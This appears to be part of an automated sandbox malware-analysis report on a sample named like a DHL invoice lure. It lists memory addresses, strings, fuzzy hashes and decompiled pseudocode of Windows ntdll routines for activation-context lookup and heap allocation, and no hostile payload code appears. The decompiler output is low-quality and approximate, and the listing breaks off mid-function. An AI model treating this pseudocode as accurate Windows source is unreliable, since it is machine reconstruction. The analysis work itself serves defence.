0x1d7ba332
0x1d7ba337
0x1d7ba393
0x1d7ba399
0x1d7ba339
0x1d7ba339
0x1d7ba342
0x1d7ba344
0x1d7ba34a
0x1d7ba34e
0x1d7ba355
0x1d7ba359
0x00000000
0x1d7ba360
0x1d7ba363
0x1d7ba3fa
0x1d7ba3fc
0x1d807847
0x1d80784f
0x00000000
0x1d807855
0x1d807855
0x1d807859
0x00000000
0x1d80785f
0x1d80785f
0x1d807862
0x1d807868
0x1d807892
0x1d807894
0x00000000
0x00000000
0x00000000
0x00000000
0x1d80786a
0x1d80786d
0x1d80787e
0x1d80788b
0x00000000
0x1d807880
0x1d807880
0x1d807885
0x1d80789a
0x1d80789a
0x1d80789f
0x00000000
0x1d80789f
0x1d80786f
0x1d807873
0x1d80788e
0x1d80788e
0x00000000
0x1d80788e
0x1d80786d
0x1d807868
0x1d807859
0x1d7ba402
0x1d7ba402
0x1d7ba405
0x1d7ba554
0x1d7ba556
0x1d7ba55e
0x1d7ba564
0x1d7ba56a
0x00000000
0x1d7ba570
0x1d7ba570
0x1d7ba575
0x00000000
0x1d7ba575
0x1d7ba40b
0x1d7ba40e
0x00000000
0x1d7ba414
0x1d7ba414
0x1d7ba418
0x1d7ba420
0x1d7ba426
0x1d7ba42c
0x00000000
0x1d7ba432
0x1d7ba432
0x1d7ba437
0x00000000
0x1d7ba437
0x1d7ba42c
0x1d7ba40e
0x1d7ba405
0x1d7ba369
0x1d7ba369
0x1d7ba36c
0x1d8078e3
0x00000000
0x1d7ba372
0x1d7ba372
0x1d7ba374
0x1d7ba452
0x1d7ba459
0x1d7ba57e
0x1d7ba585
0x00000000
0x1d7ba594
0x1d7ba594
0x1d7ba598
0x00000000
0x1d7ba598
0x1d7ba45f
0x1d7ba45f
0x1d7ba47f
0x1d7ba483
0x1d7ba485
0x1d7ba487
0x1d7ba489
0x1d7ba48b
0x00000000
0x1d7ba491
0x1d7ba493
0x1d8078a8
0x1d8078b1
0x1d8078c3
0x1d8078c3
0x1d8078cb
0x00000000
0x00000000
0x1d8078d6
0x1d8078dc
0x00000000
0x1d8078de
0x00000000
0x1d8078de
0x00000000
0x1d8078dc
0x1d8078c3
0x1d8078b1
0x1d7ba499
0x1d7ba499
0x00000000
0x1d7ba499
0x1d7ba48b
0x1d7ba37a
0x1d7ba37a
0x1d7ba37f
0x1d7ba381
0x1d7ba49b
0x1d7ba49b
0x1d7ba4a2
0x00000000
0x1d7ba4a8
0x00000000
0x1d7ba4a8
0x1d7ba387
0x1d7ba387
0x1d7ba38c
0x1d7ba38e
0x1d7ba38e
0x00000000
0x1d7ba38c
0x1d7ba381
0x1d7ba374
0x1d7ba36c
0x00000000
0x1d7ba363
0x1d7ba360
0x1d7ba337
0x00000000
0x1d7ba32c
0x1d8078f1
0x1d8078f1
0x1d8078fc
0x1d807904
0x00000000
0x1d807904
0x1d7ba2eb
0x1d7ba2de
0x1d7ba2ac
0x1d7ba28e
0x1d7ba4cc
0x00000000
0x00000000
0x00000000
0x1d7ba269
0x00000000
0x1d7ba39c
0x1d7ba39c
0x1d7ba39f
0x00000000
0x1d7ba3a5
0x1d7ba3a8
0x00000000
0x00000000
0x00000000
0x00000000
0x1d7ba3a8
0x00000000
0x1d7ba39f
0x1d7ba250
0x1d7ba1e8
0x1d7ba1f1
0x1d8077d8
0x1d8077dd
0x1d8077e2
0x1d8077e7
0x1d8077e7
0x1d8077e9
0x1d8077eb
0x00000000
0x1d7ba1f7
0x1d7ba1f7
0x00000000
0x1d7ba1f7
0x1d7ba1f1
0x1d7ba1e6
0x1d7ba1dd
0x1d7ba1d4
0x1d7ba1cc
0x1d7ba1c0
0x1d7ba1b1
0x00000000

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8077E2
SsHd, xrefs: 1D7BA304
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D807807
RtlpFindActivationContextSection_CheckParameters, xrefs: 1D8077DD, 1D807802
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D8078F3
Actx , xrefs: 1D807819, 1D807880

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 67ea11a0849853ae1f6b57e72abc9374bac5061e3a7b22aead76df05178af9b7
Instruction ID: 0e84579935f2e4dbd1f739188dca6b2de6faff34f320159721892507ba1f38cd
Opcode Fuzzy Hash: 67ea11a0849853ae1f6b57e72abc9374bac5061e3a7b22aead76df05178af9b7
Instruction Fuzzy Hash: 48E1D170A083428FDB15EE28C894B6B77E1BF85635F114A2EF895CB290D7B1D945CB83

Uniqueness

Uniqueness Score: -1.00%

Function 1D7BD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E1D7BD690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x1d89b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E1D7E4B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E1D82EF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E1D7BD580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E1D82EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E1D7BA600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E1D7F8050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E1D7F8050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x1d8991e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E1D7A4428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E1D7E8170( &_v36, _t228 + _t254, _t211, 0x1c, E1D79B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}

0x1d7bd698
0x1d7bd6a2
0x1d7bd6a6
0x1d7bd6ad
0x1d7bd6b1
0x1d7bd6b4
0x1d7bd6b8
0x1d7bd6c3
0x1d7bd6c7
0x1d7bd6cb
0x1d7bd90e
0x00000000
0x1d80913f
0x1d80913f
0x1d7bd847
0x1d7bd84b
0x1d7bd84c
0x1d7bd84d
0x1d7bd858
0x1d7bd858
0x1d7bd90e
0x1d7bd6d1
0x1d7bd6d1
0x1d7bd6db
0x1d809164
0x1d809164
0x00000000
0x1d809164
0x1d7bd6e1
0x1d7bd6ea
0x00000000
0x00000000
0x1d7bd6f3
0x1d7bd8fc
0x1d7bd701
0x1d7bd704
0x00000000
0x00000000
0x1d7bd70a
0x1d7bd70d
0x1d7bd922
0x00000000
0x00000000
0x1d809149
0x1d80914e
0x1d809153
0x1d809158
0x1d809158
0x1d80915a
0x1d80915c
0x1d809161
0x00000000
0x1d809161
0x1d7bd713
0x1d7bd716
0x1d7bd936
0x00000000
0x00000000
0x1d80916e
0x1d809173
0x1d809178
0x00000000
0x1d809178
0x1d7bd71c
0x1d7bd71f
0x1d7bd723
0x1d7bd72f
0x1d7bd73c
0x1d7bd745
0x1d7bd749
0x1d7bd751
0x1d7bd759
0x1d7bd768
0x00000000
0x00000000
0x1d7bd76e
0x1d7bd772
0x00000000
0x00000000
0x1d7bd778
0x1d7bd77f
0x1d7bd8f1
0x1d7bd8f1
0x1d809370
0x1d809370
0x1d80937b
0x1d809380
0x1d809383
0x00000000
0x1d809383
0x1d7bd785
0x1d7bd790
0x1d7bd790
0x1d7bd790
0x1d7bd79a
0x00000000
0x00000000
0x1d7bd7a0
0x1d7bd7a3
0x1d7bd7a7
0x1d7bd80d
0x1d7bd80d
0x1d7bd816
0x1d7bd81c
0x1d7bd820
0x1d7bd822
0x1d7bd826
0x1d7bd829
0x00000000
0x1d7bd830
0x1d7bd833
0x1d7bd85d
0x1d7bd860
0x1d8092e0
0x1d8092e8
0x1d7bd941
0x1d7bd941
0x1d7bd949
0x1d7bd94f
0x1d7bd874
0x1d7bd874
0x1d7bd87a
0x1d7bd884
0x00000000
0x00000000
0x1d7bd886
0x1d7bd88b
0x1d7bd83e
0x1d7bd840
0x1d7bd891
0x1d7bd8a5
0x1d7bd8ac
0x1d80933a
0x1d7bd8dc
0x1d7bd8de
0x1d80935b
0x00000000
0x00000000
0x00000000
0x1d809361
0x1d7bd8e4
0x1d7bd8eb
0x00000000
0x00000000
0x00000000
0x1d809349
0x1d809349
0x1d80934d
0x00000000
0x1d80934d
0x1d80933a
0x1d7bd8b2
0x1d7bd8d2
0x1d7bd8d6
0x1d7bd8d8
0x1d7bd8da
0x00000000
0x1d7bd8da
0x1d7bd842
0x1d7bd842
0x00000000
0x1d7bd842
0x1d7bd955
0x1d7bd95a
0x00000000
0x1d7bd95a
0x1d8092ee
0x1d8092f2
0x00000000
0x00000000
0x1d8092f8
0x1d8092fb
0x1d809301
0x1d80931f
0x1d809321
0x00000000
0x00000000
0x1d809327
0x1d809327
0x1d80932c
0x00000000
0x1d80932c
0x1d809306
0x1d809313
0x1d80931c
0x00000000
0x1d80931c
0x1d809315
0x00000000
0x1d809315
0x1d809308
0x00000000
0x1d809308
0x1d7bd866
0x1d7bd869
0x00000000
0x00000000
0x1d7bd872
0x00000000
0x00000000
0x00000000
0x1d7bd872
0x1d7bd835
0x1d7bd838
0x1d809366
0x00000000
0x1d809366
0x00000000
0x1d7bd838
0x1d7bd830
0x1d7bd7ad
0x1d80917f
0x1d80917f
0x1d7bd7b3
0x1d7bd7b8
0x1d809188
0x00000000
0x00000000
0x1d809194
0x1d8091a5
0x1d8091ac
0x1d8091ae
0x1d8091b0
0x1d8091b7
0x00000000
0x00000000
0x00000000
0x00000000
0x1d8091bd
0x1d8091bd
0x1d8091c8
0x1d8091ca
0x1d8091d7
0x00000000
0x00000000
0x1d8091e5
0x1d8091e6
0x1d8091ec
0x1d8091f0
0x00000000
0x00000000
0x00000000
0x1d8091f2
0x1d7bd7be
0x1d7bd7be
0x1d7bd7c2
0x1d7bd7c5
0x1d8091f7
0x1d8091fa
0x1d8091fe
0x1d809213
0x1d809216
0x1d80921a
0x1d80921d
0x00000000
0x00000000
0x00000000
0x1d80921f
0x1d809224
0x1d7bd805
0x1d7bd807
0x1d809231
0x00000000
0x00000000
0x1d809237
0x1d80923d
0x1d809244
0x1d80924e
0x1d809254
0x1d80925c
0x1d809261
0x1d809261
0x1d80925c
0x1d80926d
0x1d80926f
0x1d809274
0x1d809286
0x1d809299
0x1d80929f
0x1d8092a1
0x1d8092aa
0x1d8092ae
0x1d8092b0
0x1d8092b0
0x1d8092ae
0x1d809274
0x1d8092b6
0x1d8092d9
0x1d8092d9
0x00000000
0x1d8092b6
0x00000000
0x1d7bd807
0x1d7bd7cb
0x1d7bd7d9
0x1d7bd7e0
0x1d7bd7e7
0x1d7bd7ee
0x1d7bd7fb
0x1d7bd800
0x1d7bd803
0x1d7bd803
0x00000000
0x1d7bd7b8
0x00000000
0x1d7bd790
0x00000000
0x1d7bd902
0x1d7bd6fb
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D809299

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D809153
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D809178
RtlpFindActivationContextSection_CheckParameters, xrefs: 1D80914E, 1D809173
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D809372
GsHd, xrefs: 1D7BD794
Actx , xrefs: 1D809315

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 6b76215d5e3c3009564a31f9f618022e5684c2d46f3eec551c4a20c4441cb07d
Instruction ID: b40ac5bd4a1de0f41223c74464c29dc36954b696de89d7f940066426945cef60
Opcode Fuzzy Hash: 6b76215d5e3c3009564a31f9f618022e5684c2d46f3eec551c4a20c4441cb07d
Instruction Fuzzy Hash: A1E1A270604742DFD711CF18C884B6AB7E5BF88724F094A2DF99A8B291D771E845CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1D84F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E1D84F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x1d87d320);
				E1D7F7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E1D797662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E1D84F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E1D79B910();
						} else {
							E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E1D79B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E1D7AFED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E1D850835(_t188, 0);
						_t184 = E1D7B5D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E1D850D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E1D85D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E1D7D3AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E1D7CFDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E1D850835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x1d8947c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x1d8947c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x1d8947c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E1D79B910();
								} else {
									E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(L1D84823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E1D79B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E1D79B910();
								} else {
									E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E1D79B910("Just allocated block at %p for %Ix bytes\n",  *0x1d8947c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x1d8947a1 = 1;
									 *0x1d894100 = 0;
									asm("int3");
									 *0x1d8947a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x1d893748; // 0x0
					 *0x1d8991e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

0x1d84f0a5
0x1d84f0a7
0x1d84f0ac
0x1d84f0b3
0x1d84f0b5
0x1d84f0ba
0x1d84f0bd
0x1d84f0c7
